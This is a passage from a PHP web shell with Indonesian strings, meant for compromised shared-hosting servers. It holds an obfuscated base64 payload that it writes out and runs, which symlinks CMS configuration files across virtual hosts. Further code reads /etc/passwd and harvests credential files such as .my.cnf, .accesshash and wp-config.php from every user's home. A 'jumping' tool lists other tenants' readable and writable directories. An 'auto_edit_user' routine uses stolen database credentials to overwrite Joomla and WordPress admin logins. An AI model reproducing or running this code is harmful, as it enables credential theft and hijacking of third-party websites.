3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb28vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb28udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY21zL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLWNtcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1tYWluLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL25ld3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtaG9tZS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92Yi9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmJ+Y29uZmlnLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jYy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIxfmNvbmZpZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jbGFzc19jb3JlLnBocCcsJHNpdGVzcy4nLXZibHV0dGlufmNsYXNzX2NvcmUucGhwLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobTE1LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0td2htY3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htL1dITUNTL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLVdITUNTLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG1jcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcG9ydC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS13aG0udHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNwYW5lbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXBhbmVsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VibWl0dGlja2V0LnBocCcsJHNpdGVzcy4nLXdobWNzMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50cy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICJMb2NhdGlvbjogLi9cblxuIjs=";
609. $file = "idx_config/vhost.cin";
610. $handle = fopen($file ,"w+");
611. fwrite($handle ,base64_decode($vhost));
612. fclose($handle);
613. chmod($file, 0755);
614. if(exe("cd idx_config && ./vhost.cin")) {
615. echo "<center><a href='$link_config/idx_config'><font color=red>Done</font></a></center>";
616. } else {
617. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=red>Done</font></a></center>";
618. }
619.  
620. } else {
621. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
622. while($passwd = fgets($etc)) {
623. if($passwd == "" || !$etc) {
624. echo "<font color=red>Can't read /etc/passwd</font>";
625. } else {
626. preg_match_all('/(.*?):x:/', $passwd, $user_config);
627. foreach($user_config[1] as $user_idx) {
628. $user_config_dir = "/home/$user_idx/public_html/";
629. if(is_readable($user_config_dir)) {
630. $grab_config = array(
631. "/home/$user_idx/.my.cnf" => "cpanel",
632. "/home/$user_idx/.accesshash" => "WHM-accesshash",
633. "$user_config_dir/po-content/config.php" => "Popoji",
634. "$user_config_dir/vdo_config.php" => "Voodoo",
635. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
636. "$user_config_dir/config/koneksi.php" => "Lokomedia",
637. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
638. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
639. "$user_config_dir/whm/configuration.php" => "WHMCS",
640. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
641. "$user_config_dir/forum/config.php" => "phpBB",
642. "$user_config_dir/sites/default/settings.php" => "Drupal",
643. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
644. "$user_config_dir/app/etc/local.xml" => "Magento",
645. "$user_config_dir/joomla/configuration.php" => "Joomla",
646. "$user_config_dir/configuration.php" => "Joomla",
647. "$user_config_dir/wp/wp-config.php" => "WordPress",
648. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
649. "$user_config_dir/wp-config.php" => "WordPress",
650. "$user_config_dir/admin/config.php" => "OpenCart",
651. "$user_config_dir/slconfig.php" => "Sitelok",
652. "$user_config_dir/application/config/database.php" => "Ellislab");
653. foreach($grab_config as $config => $nama_config) {
654. $ambil_config = file_get_contents($config);
655. if($ambil_config == '') {
656. } else {
657. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
658. fputs($file_config,$ambil_config);
659. }
660. }
661. }
662. }
663. }
664. }
665. echo "<center><a href='?dir=$dir/idx_config'><font color=red>Done</font></a></center>";
666. }
667. } elseif($_GET['do'] == 'jumping') {
668. $i = 0;
669. echo "<div class='margin: 5px auto;'>";
670. if(preg_match("/hsphere/", $dir)) {
671. $urls = explode("\r\n", $_POST['url']);
672. if(isset($_POST['jump'])) {
673. echo "<pre>";
674. foreach($urls as $url) {
675. $url = str_replace(array("http://","www."), "", strtolower($url));
676. $etc = "/etc/passwd";
677. $f = fopen($etc,"r");
678. while($gets = fgets($f)) {
679. $pecah = explode(":", $gets);
680. $user = $pecah[0];
681. $dir_user = "/hsphere/local/home/$user";
682. if(is_dir($dir_user) === true) {
683. $url_user = $dir_user."/".$url;
684. if(is_readable($url_user)) {
685. $i++;
686. $jrw = "[<font color=red>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
687. if(is_writable($url_user)) {
688. $jrw = "[<font color=red>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
689. }
690. echo $jrw."<br>";
691. }
692. }
693. }
694. }
695. if($i == 0) {
696. } else {
697. echo "<br>Total ada ".$i." Kamar di ".$ip;
698. }
699. echo "</pre>";
700. } else {
701. echo '<center>
702. <form method="post">
703. List Domains: <br>
704. <textarea name="url" style="width: 500px; height: 250px;">';
705. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
706. while($getss = fgets($fp)) {
707. echo $getss;
708. }
709. echo '</textarea><br>
710. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
711. </form></center>';
712. }
713. } elseif(preg_match("/vhosts|vhost/", $dir)) {
714. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
715. $urls = explode("\r\n", $_POST['url']);
716. if(isset($_POST['jump'])) {
717. echo "<pre>";
718. foreach($urls as $url) {
719. $url = str_replace("www.", "", $url);
720. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
721. if(is_dir($web_vh) === true) {
722. if(is_readable($web_vh)) {
723. $i++;
724. $jrw = "[<font color=red>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
725. if(is_writable($web_vh)) {
726. $jrw = "[<font color=red>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
727. }
728. echo $jrw."<br>";
729. }
730. }
731. }
732. if($i == 0) {
733. } else {
734. echo "<br>Total ada ".$i." Kamar di ".$ip;
735. }
736. echo "</pre>";
737. } else {
738. echo '<center>
739. <form method="post">
740. List Domains: <br>
741. <textarea name="url" style="width: 500px; height: 250px;">';
742. bing("ip:$ip");
743. echo '</textarea><br>
744. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
745. </form></center>';
746. }
747. } else {
748. echo "<pre>";
749. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
750. while($passwd = fgets($etc)) {
751. if($passwd == '' || !$etc) {
752. echo "<font color=red>Can't read /etc/passwd</font>";
753. } else {
754. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
755. foreach($user_jumping[1] as $user_idx_jump) {
756. $user_jumping_dir = "/home/$user_idx_jump/public_html";
757. if(is_readable($user_jumping_dir)) {
758. $i++;
759. $jrw = "[<font color=red>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
760. if(is_writable($user_jumping_dir)) {
761. $jrw = "[<font color=red>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
762. }
763. echo $jrw;
764. if(function_exists('posix_getpwuid')) {
765. $domain_jump = file_get_contents("/etc/named.conf");
766. if($domain_jump == '') {
767. echo " => ( <font color=red>ERROR</font> )<br>";
768. } else {
769. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
770. foreach($domains_jump[1] as $dj) {
771. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
772. $user_jumping_url = $user_jumping_url['name'];
773. if($user_jumping_url == $user_idx_jump) {
774. echo " => ( <u>$dj</u> )<br>";
775. break;
776. }
777. }
778. }
779. } else {
780. echo "<br>";
781. }
782. }
783. }
784. }
785. }
786. if($i == 0) {
787. } else {
788. echo "<br>Ada ".$i." di ".$ip;
789. }
790. echo "</pre>";
791. }
792. echo "</div>";
793. } elseif($_GET['do'] == 'auto_edit_user') {
794. if($_POST['hajar']) {
795. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
796. echo "username atau password harus lebih dari 6 karakter";
797. } else {
798. $user_baru = $_POST['user_baru'];
799. $pass_baru = md5($_POST['pass_baru']);
800. $conf = $_POST['config_dir'];
801. $scan_conf = scandir($conf);
802. foreach($scan_conf as $file_conf) {
803. if(!is_file("$conf/$file_conf")) continue;
804. $config = file_get_contents("$conf/$file_conf");
805. if(preg_match("/JConfig|joomla/",$config)) {
806. $dbhost = ambilkata($config,"host = '","'");
807. $dbuser = ambilkata($config,"user = '","'");
808. $dbpass = ambilkata($config,"password = '","'");
809. $dbname = ambilkata($config,"db = '","'");
810. $dbprefix = ambilkata($config,"dbprefix = '","'");
811. $prefix = $dbprefix."users";
812. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
813. $db = mysql_select_db($dbname);
814. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
815. $result = mysql_fetch_array($q);
816. $id = $result['id'];
817. $site = ambilkata($config,"sitename = '","'");
818. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
819. echo "Config => ".$file_conf."<br>";
820. echo "CMS => Joomla<br>";
821. if($site == '') {
822. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
823. } else {
824. echo "Sitename => $site<br>";
825. }
826. if(!$update OR !$conn OR !$db) {
827. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
828. } else {
829. echo "Status => <font color=red>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
830. }
831. mysql_close($conn);
832. } elseif(preg_match("/WordPress/",$config)) {
833. $dbhost = ambilkata($config,"DB_HOST', '","'");
834. $dbuser = ambilkata($config,"DB_USER', '","'");
835. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
836. $dbname = ambilkata($config,"DB_NAME', '","'");
837. $dbprefix = ambilkata($config,"table_prefix = '","'");
838. $prefix = $dbprefix."users";
839. $option = $dbprefix."options";
840. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
841. $db = mysql_select_db($dbname);
842. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
843. $result = mysql_fetch_array($q);
844. $id = $result[ID];
845. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
846. $result2 = mysql_fetch_array($q2);
847. $target = $result2[option_value];
848. if($target == '') {
849. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
850. } else {
851. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
852. }
853. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
